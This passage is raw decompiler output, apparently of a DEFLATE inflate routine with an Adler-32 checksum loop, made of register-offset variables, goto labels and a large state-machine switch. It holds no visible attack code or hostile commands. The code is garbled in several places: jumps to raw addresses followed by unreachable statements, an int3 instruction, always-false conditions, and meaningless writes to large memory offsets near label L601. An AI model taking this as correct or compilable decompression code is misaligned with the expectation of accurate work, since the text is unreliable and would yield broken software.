					 *(_t2870 - 0xf0) =  *(_t2870 + 0x18) -  *((intOrPtr*)(_t2870 + 0x14)) +  *( *(_t2870 + 0x1c)) - 1;
				} else {
					 *(_t2870 - 0xf0) = 0xffffffff;
				}
				 *(_t2870 - 0x88) =  *(_t2870 - 0xf0);
				if(( *(_t2870 - 0x88) + 0x00000001 &  *(_t2870 - 0x88)) != 0 ||  *(_t2870 + 0x18) <  *((intOrPtr*)(_t2870 + 0x14))) {
					 *( *(_t2870 + 0x1c)) = 0;
					 *( *(_t2870 + 0x10)) = 0;
					_t1688 = 0xfffffffd;
				} else {
					 *(_t2870 - 8) =  *( *(_t2870 + 8) + 4);
					 *(_t2870 - 0xc) =  *( *(_t2870 + 8) + 0x38);
					 *(_t2870 - 0x28) =  *( *(_t2870 + 8) + 0x20);
					 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x24);
					 *(_t2870 - 0x24) =  *( *(_t2870 + 8) + 0x28);
					_t1692 =  *( *(_t2870 + 8) + 0x3c);
					 *(_t2870 - 0x7c) = _t1692;
					_t2086 =  *(_t2870 + 8);
					_t2465 =  *_t2086;
					 *(_t2870 - 0xf8) = _t2465;
					if( *(_t2870 - 0xf8) <= 0x35) {
						_t50 =  *(_t2870 - 0xf8) + 0x1f55b0; // 0xcccccc20
						switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M001F5528))) {
							case 0:
								 *( *(_t2870 + 8) + 0xc) = 0;
								 *( *(_t2870 + 8) + 8) = 0;
								 *(_t2870 - 0x24) = 0;
								 *(_t2870 - 0x10) =  *(_t2870 - 0x24);
								 *(_t2870 - 0x28) =  *(_t2870 - 0x10);
								 *(_t2870 - 8) =  *(_t2870 - 0x28);
								 *(_t2870 - 0xc) =  *(_t2870 - 8);
								 *( *(_t2870 + 8) + 0x1c) = 1;
								 *( *(_t2870 + 8) + 0x10) = 1;
								if(( *(_t2870 + 0x20) & 0x00000001) == 0) {
									goto L48;
								} else {
									goto L9;
								}
								goto L600;
							case 1:
								if(0 != 0) {
									L11:
									 *(_t2870 - 0x1c) = 1;
									_t2086 =  *(_t2870 + 8);
									 *_t2086 = 1;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L10;
									} else {
										 *( *((intOrPtr*)(__ebp + 8)) + 8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										L18:
										L20:
										if(0 != 0) {
											L9:
											_t2465 =  *(_t2870 - 4);
											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
												 *( *(_t2870 + 8) + 8) =  *( *(_t2870 - 4)) & 0x000000ff;
												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
												goto L20;
											} else {
												L10:
												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
												if(_t1692 == 0) {
													 *( *(_t2870 + 8) + 8) = 0;
													goto L18;
												} else {
													goto L11;
												}
											}
										} else {
											goto L21;
										}
									}
								}
								goto L600;
							case 2:
								if(0 != 0) {
									L23:
									 *(_t2870 - 0x1c) = 1;
									_t2086 =  *(_t2870 + 8);
									 *_t2086 = 2;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L22;
									} else {
										 *( *((intOrPtr*)(__ebp + 8)) + 0xc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										L30:
										L32:
										if(0 != 0) {
											L21:
											_t2465 =  *(_t2870 - 4);
											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
												 *( *(_t2870 + 8) + 0xc) =  *( *(_t2870 - 4)) & 0x000000ff;
												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
												goto L32;
											} else {
												L22:
												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
												if(_t1692 == 0) {
													 *( *(_t2870 + 8) + 0xc) = 0;
													goto L30;
												} else {
													goto L23;
												}
											}
										} else {
											if((( *( *(_t2870 + 8) + 8) << 8) +  *( *(_t2870 + 8) + 0xc)) % 0x1f != 0 || ( *( *(_t2870 + 8) + 0xc) & 0x00000020) != 0 || ( *( *(_t2870 + 8) + 8) & 0x0000000f) != 8) {
												 *(_t2870 - 0x110) = 1;
											} else {
												 *(_t2870 - 0x110) = 0;
											}
											_t1692 =  *(_t2870 - 0x110);
											 *(_t2870 - 0x10) = _t1692;
											_t2086 =  *(_t2870 + 0x20) & 0x00000004;
											if(_t2086 == 0) {
												_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
												if(1 > 0x8000) {
													L42:
													 *(_t2870 - 0x10c) = 1;
												} else {
													_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
													if( *(_t2870 - 0x88) + 1 < 1) {
														goto L42;
													} else {
														 *(_t2870 - 0x10c) = 0;
													}
												}
												_t2086 =  *(_t2870 - 0x10) |  *(_t2870 - 0x10c);
												 *(_t2870 - 0x10) = _t2086;
											}
											if( *(_t2870 - 0x10) == 0) {
												goto L48;
											} else {
												goto L45;
											}
										}
									}
								}
								goto L600;
							case 3:
								if(0 != 0) {
									goto L51;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L50;
									} else {
										 *(__ebp - 0xe4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L58;
									}
								}
								goto L600;
							case 4:
								if(0 != 0) {
									goto L67;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L66;
									} else {
										 *(__ebp - 0xb0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L74;
									}
								}
								goto L600;
							case 5:
								if(0 != 0) {
									goto L86;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L85;
									} else {
										 *(__ebp - 0xec) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L93;
									}
								}
								goto L600;
							case 6:
								if(0 != 0) {
									goto L101;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L100;
									} else {
										 *((char*)( *((intOrPtr*)(__ebp + 8)) +  *((intOrPtr*)(__ebp - 0x10)) + 0x2920)) =  *( *(__ebp - 4));
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L108;
									}
								}
								goto L600;
							case 7:
								if(0 != 0) {
									goto L141;
								} else {
									goto L140;
								}
								goto L600;
							case 8:
								if(0 == 0) {
								}
								goto L165;
							case 9:
								if(0 != 0) {
									goto L193;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L192;
									} else {
										 *(__ebp - 0xe0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L200;
									}
								}
								goto L600;
							case 0xa:
								if(0 != 0) {
									goto L215;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L214;
									} else {
										 *(__ebp - 0xc0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L222;
									}
								}
								goto L600;
							case 0xb:
								if(0 != 0) {
									goto L293;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L292;
									} else {
										 *(__ebp - 0xb4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L300;
									}
								}
								goto L600;
							case 0xc:
								if(0 == 0) {
								}
								goto L318;
							case 0xd:
								if(0 != 0) {
									goto L325;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L324;
									} else {
										 *(__ebp - 0xbc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L332;
									}
								}
								goto L600;
							case 0xe:
								if(0 == 0) {
								}
								goto L344;
							case 0xf:
								if(0 != 0) {
									goto L367;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L366;
									} else {
										 *(__ebp - 0xc4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L374;
									}
								}
								goto L600;
							case 0x10:
								if(0 != 0) {
									goto L390;
								} else {
									goto L389;
								}
								goto L600;
							case 0x11:
								if(0 != 0) {
									goto L424;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L423;
									} else {
										 *(__ebp - 0xa4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L431;
									}
								}
								goto L600;
							case 0x12:
								if(0 != 0) {
									goto L454;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L453;
									} else {
										 *(__ebp - 0xd4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L461;
									}
								}
								goto L600;
							case 0x13:
								if(0 != 0) {
									goto L479;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L478;
									} else {
										 *(__ebp - 0xdc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L486;
									}
								}
								goto L600;
							case 0x14:
								if(0 != 0) {
									goto L536;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L535;
									} else {
										 *(__ebp - 0xa8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L543;
									}
								}
								goto L600;
							case 0x15:
								if(0 == 0) {
								}
								goto L581;
							case 0x16:
								if(0 == 0) {
								}
								goto L244;
							case 0x17:
								if(0 == 0) {
								}
								L45:
								 *(_t2870 - 0x1c) = 0xffffffff;
								_t2465 =  *(_t2870 + 8);
								 *_t2465 = 0x24;
								goto L600;
							case 0x18:
								if(0 == 0) {
								}
								goto L495;
							case 0x19:
								if(0 != 0) {
									goto L146;
								} else {
									goto L144;
								}
								goto L600;
							case 0x1a:
								if(0 == 0) {
								}
								goto L114;
							case 0x1b:
								if(0 == 0) {
								}
								goto L149;
							case 0x1c:
								if(0 != 0) {
									goto L555;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L554;
									} else {
										 *(__ebp - 0xac) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L562;
									}
								}
								goto L600;
							case 0x1d:
								if(0 != 0) {
									goto L570;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L569;
									} else {
										 *(__ebp - 0x90) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L577;
									}
								}
								goto L600;
							case 0x1e:
								if(0 != 0) {
									goto L122;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L121;
									} else {
										 *(__ebp - 0xb8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L129;
									}
								}
								goto L600;
							case 0x1f:
								if(0 != 0) {
									goto L135;
								} else {
									goto L134;
								}
								goto L600;
							case 0x20:
								if(0 != 0) {
									L504:
									 *(_t2870 - 0x1c) = 2;
									_t1692 =  *(_t2870 + 8);
									 *_t1692 = 0x35;
								} else {
									L503:
									_t2465 =  *(_t2870 - 0x14);
									if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
										 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t2870 + 0x14)) + ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88))));
										 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
										 *(_t2870 - 0x7c) =  *(_t2870 - 0x7c) + 1;
										L502:
										 *(_t2870 - 0x118) =  *(_t2870 - 0x10);
										_t2086 =  *(_t2870 - 0x10) - 1;
										 *(_t2870 - 0x10) = _t2086;
										if( *(_t2870 - 0x118) == 0) {
											L350:
											_t1747 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
											if(_t1747 < 4) {
												L352:
												if( *(_t2870 - 8) >= 0xf) {
													L381:
													goto 0x330bac;
													_t2519 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
													 *(_t2870 - 0x3c) = _t2519;
													if( *(_t2870 - 0x3c) < 0) {
														 *(_t2870 - 0x50) = 0xa;
														do {
															 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2519 * 0 + 0x920 + ( !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001)) * 2));
															_t2519 =  *(_t2870 - 0x50) + 1;
															 *(_t2870 - 0x50) = _t2519;
														} while ( *(_t2870 - 0x3c) < 0);
													} else {
														 *(_t2870 - 0x50) =  *(_t2870 - 0x3c) >> 9;
														 *(_t2870 - 0x3c) =  *(_t2870 - 0x3c) & 0x000001ff;
													}
													 *(_t2870 - 0x10) =  *(_t2870 - 0x3c);
													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x50);
													_t1747 =  *(_t2870 - 8) -  *(_t2870 - 0x50);
													 *(_t2870 - 8) = _t1747;
													_t2086 = 0;
													if(0 != 0) {
														goto L352;
													} else {
														if( *(_t2870 - 0x10) < 0x100) {
															L389:
															_t2465 =  *(_t2870 - 0x14);
															if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
																 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
																_t2086 =  *(_t2870 - 0x14) + 1;
																 *(_t2870 - 0x14) = _t2086;
																goto L417;
															} else {
																L390:
																 *(_t2870 - 0x1c) = 2;
																_t1692 =  *(_t2870 + 8);
																 *_t1692 = 0x18;
															}
														} else {
															goto L418;
														}
													}
												} else {
													if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
														_t1747 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
														 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
														goto L381;
													} else {
														L354:
														goto 0x330b73;
														_t2534 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
														 *(_t2870 - 0x3c) = _t2534;
														if( *(_t2870 - 0x3c) < 0) {
															if( *(_t2870 - 8) <= 0xa) {
																goto L365;
															} else {
																 *(_t2870 - 0x50) = 0xa;
																while(1) {
																	goto 0x330b86;
																	_t1747 =  !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001);
																	 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2534 * 0 + 0x920 + _t1747 * 2));
																	_t2534 =  *(_t2870 - 0x50) + 1;
																	 *(_t2870 - 0x50) = _t2534;
																	if( *(_t2870 - 0x3c) >= 0) {
																		break;
																	}
																	_t1747 =  *(_t2870 - 0x50) + 1;
																	if( *(_t2870 - 8) >= _t1747) {
																		continue;
																	}
																	break;
																}
																if( *(_t2870 - 0x3c) < 0) {
																	goto L365;
																} else {
																	goto L378;
																}
															}
														} else {
															_t1747 =  *(_t2870 - 0x3c) >> 9;
															 *(_t2870 - 0x50) = _t1747;
															if( *(_t2870 - 0x50) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x50)) {
																L365:
																_t2086 =  *(_t2870 - 4);
																if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																	 *(_t2870 - 0xc4) =  *( *(_t2870 - 4)) & 0x000000ff;
																	 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																	goto L376;
																} else {
																	L366:
																	_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																	if(_t2465 == 0) {
																		 *(_t2870 - 0xc4) = 0;
																		L374:
																		L376:
																		if(0 != 0) {
																			goto L365;
																		} else {
																			 *(_t2870 - 0xc) =  *(_t2870 - 0xc4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																			_t1747 =  *(_t2870 - 8) + 8;
																			 *(_t2870 - 8) = _t1747;
																			if( *(_t2870 - 8) < 0xf) {
																				goto L354;
																			} else {
																				goto L378;
																			}
																		}
																	} else {
																		L367:
																		 *(_t2870 - 0x1c) = 1;
																		_t1692 =  *(_t2870 + 8);
																		 *_t1692 = 0x17;
																	}
																}
															} else {
																L378:
																goto L381;
															}
														}
													}
												}
											} else {
												_t2086 =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
												if(_t2086 >= 2) {
													if( *(_t2870 - 8) < 0xf) {
														_t1747 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
														 *(_t2870 - 0xc) = _t1747;
														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
													}
													_t2164 =  *(_t2870 - 0xc) & 0x000003ff;
													 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + _t2164 * 2));
													if( *(_t2870 - 0x38) < 0) {
														 *(_t2870 - 0x54) = 0xa;
														do {
															_t2164 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2164 * 0 + 0x920 + ( !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001)) * 2));
															 *(_t2870 - 0x38) = _t2164;
															 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
														} while ( *(_t2870 - 0x38) < 0);
													} else {
														 *(_t2870 - 0x54) =  *(_t2870 - 0x38) >> 9;
													}
													 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x54);
													_t1863 =  *(_t2870 - 8) -  *(_t2870 - 0x54);
													 *(_t2870 - 8) = _t1863;
													if(( *(_t2870 - 0x10) & 0x00000100) == 0) {
														if( *(_t2870 - 8) < 0xf) {
															_t1863 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
															 *(_t2870 - 0xc) = _t1863;
															 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
															 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
														}
														_t2171 =  *(_t2870 - 0xc) & 0x000003ff;
														 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1863 * 0 + 0x120 + _t2171 * 2));
														if( *(_t2870 - 0x38) < 0) {
															 *(_t2870 - 0x54) = 0xa;
															do {
																_t1868 =  !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001);
																_t2171 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2171 * 0 + 0x920 + _t1868 * 2));
																 *(_t2870 - 0x38) = _t2171;
																 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
															} while ( *(_t2870 - 0x38) < 0);
														} else {
															_t1868 =  *(_t2870 - 0x38) >> 9;
															 *(_t2870 - 0x54) = _t1868;
														}
														goto 0x330c1e;
														asm("int3");
														 *(_t2870 - 0xc) = _t1868 >> _t2171;
														 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x54);
														 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
														_t1872 =  *(_t2870 - 0x38) & 0x00000100;
														if(_t1872 == 0) {
															_t2086 =  *(_t2870 - 0x14);
															 *((char*)(_t2086 + (_t1872 << 0))) =  *(_t2870 - 0x38);
															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 2;
															L417:
															goto L350;
														} else {
															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
															 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
															goto L418;
														}
													} else {
														L418:
														 *(_t2870 - 0x10) =  *(_t2870 - 0x10) & 0x000001ff;
														if( *(_t2870 - 0x10) != 0x100) {
															_t1769 =  *(0x1fac1c +  *(_t2870 - 0x10) * 4);
															 *(_t2870 - 0x24) = _t1769;
															_t2180 =  *(_t2870 - 0x10);
															_t2566 =  *(0x1fb634 + _t2180 * 4);
															 *(_t2870 - 0x10) = _t2566;
															if( *(_t2870 - 0x24) == 0) {
																L437:
																if( *(_t2870 - 8) >= 0xf) {
																	L468:
																	_t2182 =  *((short*)( *(_t2870 + 8) + (_t1769 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																	 *(_t2870 - 0x44) = _t2182;
																	if( *(_t2870 - 0x44) < 0) {
																		 *(_t2870 - 0x4c) = 0xa;
																		do {
																			 *(_t2870 - 0x44) =  *((short*)( *(_t2870 + 8) + (_t2182 << 0) + 0x40 + 0x920 + ( !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001)) * 2));
																			_t2182 =  *(_t2870 - 0x4c) + 1;
																			 *(_t2870 - 0x4c) = _t2182;
																		} while ( *(_t2870 - 0x44) < 0);
																	} else {
																		 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
																		 *(_t2870 - 0x44) =  *(_t2870 - 0x44) & 0x000001ff;
																	}
																	 *(_t2870 - 0x28) =  *(_t2870 - 0x44);
																	_t1769 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x4c);
																	 *(_t2870 - 0xc) = _t1769;
																	 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x4c);
																	_t2566 = 0;
																	if(0 != 0) {
																		goto L437;
																	} else {
																		 *(_t2870 - 0x24) =  *(0x1fb0a0 +  *(_t2870 - 0x28) * 4);
																		_t2592 =  *(_t2870 - 0x28);
																		_t1789 =  *(0x1fb120 + _t2592 * 4);
																		 *(_t2870 - 0x28) = _t1789;
																		if( *(_t2870 - 0x24) == 0) {
																			L493:
																			 *(_t2870 - 0x7c) =  *(_t2870 - 0x14) -  *((intOrPtr*)(_t2870 + 0x14));
																			_t2465 =  *(_t2870 - 0x28);
																			if(_t2465 <=  *(_t2870 - 0x7c)) {
																				L498:
																				_t2211 = ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88)) +  *((intOrPtr*)(_t2870 + 0x14));
																				 *(_t2870 - 0x30) = _t2211;
																				if( *(_t2870 - 0x14) <=  *(_t2870 - 0x30)) {
																					_t2211 =  *(_t2870 - 0x30);
																					 *(_t2870 - 0xf4) = _t2211;
																				} else {
																					_t1789 =  *(_t2870 - 0x14);
																					 *(_t2870 - 0xf4) = _t1789;
																				}
																				if( *(_t2870 - 0xf4) +  *(_t2870 - 0x10) <=  *((intOrPtr*)(_t2870 - 0x70))) {
																					if( *(_t2870 - 0x10) < 9 ||  *(_t2870 - 0x10) >  *(_t2870 - 0x28)) {
																						L522:
																						goto L523;
																					} else {
																						 *((intOrPtr*)(_t2870 - 0x11c)) = ( *(_t2870 - 0x10) & 0xfffffff8) +  *(_t2870 - 0x30);
																						do {
																							 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2211 * 0));
																							 *((intOrPtr*)( *(_t2870 - 0x14) + (4 << 0))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (4 << 0)));
																							_t2211 =  *(_t2870 - 0x14) + 8;
																							 *(_t2870 - 0x14) = _t2211;
																							_t2612 =  *(_t2870 - 0x30) + 8;
																							 *(_t2870 - 0x30) = _t2612;
																							_t1789 =  *(_t2870 - 0x30);
																						} while (_t1789 <  *((intOrPtr*)(_t2870 - 0x11c)));
																						_t2086 =  *(_t2870 - 0x10) & 0x00000007;
																						 *(_t2870 - 0x10) = _t2086;
																						if( *(_t2870 - 0x10) >= 3) {
																							do {
																								goto L522;
																								L523:
																								 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t1789 * 0));
																								 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 0)));
																								 *((char*)( *(_t2870 - 0x14) + (1 << 1))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 1)));
																								_t2086 =  *(_t2870 - 0x14) + 3;
																								 *(_t2870 - 0x14) = _t2086;
																								 *(_t2870 - 0x30) =  *(_t2870 - 0x30) + 3;
																								_t1789 =  *(_t2870 - 0x10) - 3;
																								 *(_t2870 - 0x10) = _t1789;
																							} while ( *(_t2870 - 0x10) > 2);
																							if( *(_t2870 - 0x10) > 0) {
																								_t1798 =  *(_t2870 - 0x14);
																								 *_t1798 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2086 * 0));
																								if( *(_t2870 - 0x10) > 1) {
																									 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t1798 << 0)));
																								}
																								_t2086 =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
																								 *(_t2870 - 0x14) = _t2086;
																							}
																						} else {
																							if( *(_t2870 - 0x10) != 0) {
																								_t2086 =  *(_t2870 - 0x14);
																								 *_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2612 * 0));
																								if( *(_t2870 - 0x10) > 1) {
																									_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t2086 << 0)));
																									 *( *(_t2870 - 0x14) + (1 << 0)) = _t2086;
																								}
																								 *(_t2870 - 0x14) =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
																							}
																						}
																						goto L350;
																					}
																					L601:
																					 *(_t2075 + 0x5189f455) =  *(_t2075 + 0x5189f455) | _t2086;
																					 *(_t2075 + 0x4289f045) =  *(_t2075 + 0x4289f045) | _t2086;
																					_t2870 = _t2870;
																					 *(_t2075 + 0x5189dc55) =  *(_t2075 + 0x5189dc55) | _t2086;
																					 *((intOrPtr*)(_t2075 + 0x4d8b0845)) =  *((intOrPtr*)(_t2075 + 0x4d8b0845)) - _t2086;
																					asm("cld");
																					 *( *(_t2870 + 0x10)) = _t2465 + 1 -  *(_t2870 + 0xc);
																					 *( *(_t2870 + 0x1c)) =  *(_t2870 - 0x14) -  *(_t2870 + 0x18);
																					if(( *(_t2870 + 0x20) & 0x00000009) != 0 &&  *(_t2870 - 0x1c) >= 0) {
																						 *(_t2870 - 0x58) =  *(_t2870 + 0x18);
																						 *(_t2870 - 0x98) =  *( *(_t2870 + 0x1c));
																						 *(_t2870 - 0x20) =  *( *(_t2870 + 8) + 0x1c) & 0x0000ffff;
																						 *(_t2870 - 0x2c) =  *( *(_t2870 + 8) + 0x1c) >> 0x10;
																						_t1700 =  *(_t2870 - 0x98);
																						_t1701 = _t1700 / 0x15b0;
																						_t2473 = _t1700 % 0x15b0;
																						 *(_t2870 - 0xa0) = _t2473;
																						while( *(_t2870 - 0x98) != 0) {
																							 *(_t2870 - 0x84) = 0;
																							while( *(_t2870 - 0x84) + 7 <  *(_t2870 - 0xa0)) {
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + _t2473 * 0) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 0)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 1)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 3) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 2)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 5) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 6) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 7) & 0x000000ff) +  *(_t2870 - 0x20);
